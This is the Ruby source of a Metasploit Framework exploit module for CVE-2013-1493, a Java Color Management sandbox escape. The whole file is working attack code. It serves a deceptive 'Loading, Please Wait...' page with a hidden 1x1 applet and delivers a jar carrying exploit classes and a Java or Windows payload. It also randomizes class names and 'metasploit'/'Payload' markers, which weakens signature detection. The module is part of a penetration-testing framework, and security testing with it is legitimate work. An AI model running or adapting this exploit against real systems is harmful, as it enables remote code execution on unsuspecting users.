##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
require 'msf/core'
require 'rex'
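class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The served page is a plain <applet> tag; no client-side JavaScript is
  # required, so BrowserAutopwn may offer it to scripting-disabled clients.
  autopwn_info({ :javascript => false })

  # Module metadata for CVE-2013-1493 (Java CMM / color management sandbox
  # escape). Two targets are offered: a pure Java payload and a Windows x86
  # native payload; 'DefaultTarget' => 1 selects the latter.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four precompiled helper classes shipped with the framework
  # under data/exploits/cve-2013-1493 and randomizes the name of the applet
  # entry class. These are trusted, framework-bundled assets, not user input.
  #
  # Only "Init" is renamed; Leak, MyBufferedImage and MyColorSpace keep their
  # compiled names (they are added verbatim to the jar in on_request_uri), so
  # signature-based detection can still key on those. The replacement name is
  # chosen with the same length as "Init" so the byte-level substitution into
  # the raw class file does not disturb its length-prefixed string entries.
  def setup
    base = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493")

    @init_class           = read_class_file(File.join(base, "Init.class"))
    @leak_class           = read_class_file(File.join(base, "Leak.class"))
    @buffered_image_class = read_class_file(File.join(base, "MyBufferedImage.class"))
    @color_space_class    = read_class_file(File.join(base, "MyColorSpace.class"))

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Dispatches an incoming request by URI:
  #   *.jar  -> the applet jar: the encoded payload jar plus the helper classes,
  #             with "metasploit"/"Payload" markers in entry names and bodies
  #             replaced by random strings before the manifest is rebuilt
  #   .../   -> the HTML page carrying the <applet> tag (404 if no payload
  #             can be generated for this client)
  #   other  -> redirect to the resource root
  #
  # @param cli     client connection handed over by the HTTP server mixin
  # @param request parsed request; only request.uri is consulted
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Same-length random replacements so the byte-level rewrite of jar
      # entry contents stays size-stable.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str    = rand_text_alpha("payload".length)
      jar.entries.each do |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      end
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      unless payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the landing page: a 1x1 <applet> whose archive name is random per
  # request and whose code attribute is the randomized Init class name chosen
  # in setup. The jar request it triggers is served by the /\.jar$/ branch above.
  #
  # @return [String] the HTML document
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    html
  end

  private

  # Reads a bundled class file as raw bytes (binary mode, whole file).
  #
  # @param path [String] absolute path to the .class file
  # @return [String] the file contents
  def read_class_file(path)
    File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
  end
end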